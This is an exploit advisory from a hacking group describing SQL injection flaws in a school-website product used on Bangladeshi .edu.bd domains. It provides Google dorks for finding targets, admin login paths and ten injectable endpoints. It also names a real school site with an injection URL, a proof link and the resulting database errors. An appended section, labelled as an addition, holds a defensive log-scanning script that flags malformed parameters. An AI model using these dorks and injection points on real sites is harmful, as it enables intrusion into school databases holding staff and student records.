
Tariqul Computer & Internet Point TcipBD SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019
###################################################################

# Exploit Title : Tariqul Computer & Internet Point TcipBD SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : tcipbd.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Developed By: Tariqul Computer & Internet Point'' site:edu.bd
intext:''TARIQUL COMPUTER & INTERNET POINT'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-tariqul-computer-internet-point-tcipbd-sql-injection.html

###################################################################

# Admin Panel Login Path :
************************

/admin/login.php
/teacher/login.php

# SQL Injection Exploit :
**********************

/teacher_details.php?link=[SQL Injection]

/employee_details.php?link=[SQL Injection]

/teacher_information.php?id=[SQL Injection]

/teacher_information.php?id=[ID-NUMBER-HERE]&cat=[SQL Injection]

/commute_details.php?link=[SQL Injection]

/commute.php?id=[SQL Injection]

/info_details.php?link=[YEAR]&id=[SQL Injection]

/t_per_details.php?date=[YEAR-MONTH-DAY][SQL Injection]

/s_details_details.php?link=[ID-NUMBER-HERE]&date=[YEAR-MONTH-DAY]&class=[SQL Injection]

/s_per_details.php?class=[ID-NUMBER-HERE]&sec=[ID-NUMBER-HERE]&date=[YEAR-MONTH-DAY][SQL Injection]

###################################################################

# Example Vulnerable Site =>
*****************************

[+] akkelpurghs.edu.bd/teacher_details.php?link=19%27

=> [ Proof of Concept for SQL Inj ] => archive.vn/1PDNL

###################################################################

# SQL Database Error :
*********************

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/tcaip/akkelpurghs.edu.bd/teacher_details.php on line 11

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/tcaip/akkelpurghs.edu.bd/s_details_details.php on line 17
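
A defender-side check for the endpoints listed above, added here as an example and not part of the original advisory: it scans web access-log lines for requests to those scripts whose parameters do not match the formats implied by the advisory's placeholders. The integer typing of link/id/cat/class/sec, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Expected formats come from the advisory's placeholders ([ID-NUMBER-HERE],
# [YEAR], [YEAR-MONTH-DAY]); integer typing of link/id/cat/class/sec is assumed.
INT = re.compile(r"[0-9]{1,10}")
DATE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")
RULES = {
    "/teacher_details.php": {"link": INT},
    "/employee_details.php": {"link": INT},
    "/teacher_information.php": {"id": INT, "cat": INT},
    "/commute_details.php": {"link": INT},
    "/commute.php": {"id": INT},
    "/info_details.php": {"link": INT, "id": INT},
    "/t_per_details.php": {"date": DATE},
    "/s_details_details.php": {"link": INT, "date": DATE, "class": INT},
    "/s_per_details.php": {"class": INT, "sec": INT, "date": DATE},
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return the (param, decoded value) pairs that break the allow-list."""
    parts = urlsplit(target)
    rules = RULES.get(parts.path)
    if rules is None:
        return []
    bad = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        pattern = rules.get(name)
        if pattern is not None and not pattern.fullmatch(value):
            bad.append((name, value))
    return bad

def scan(lines):
    """Return (line_number, path, violations) for each suspicious log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        bad = check_request(m.group(1)) if m else []
        if bad:
            hits.append((n, urlsplit(m.group(1)).path, bad))
    return hits

# Constructed sample access-log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jan/2019:10:00:01 +0000] "GET /teacher_details.php?link=19 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [08/Jan/2019:10:00:07 +0000] "GET /teacher_details.php?link=19%27 HTTP/1.1" 200 812',
    '192.0.2.10 - - [08/Jan/2019:10:01:12 +0000] "GET /t_per_details.php?date=2019-01-08 HTTP/1.1" 200 4096',
    '192.0.2.44 - - [08/Jan/2019:10:01:30 +0000] "GET /s_per_details.php?class=6&sec=1&date=2019-01-08%27 HTTP/1.1" 200 790',
]
```

The same allow-list can be enforced in front of the application (for example as input validation before the query is built), alongside moving the queries to parameterized statements.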

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################
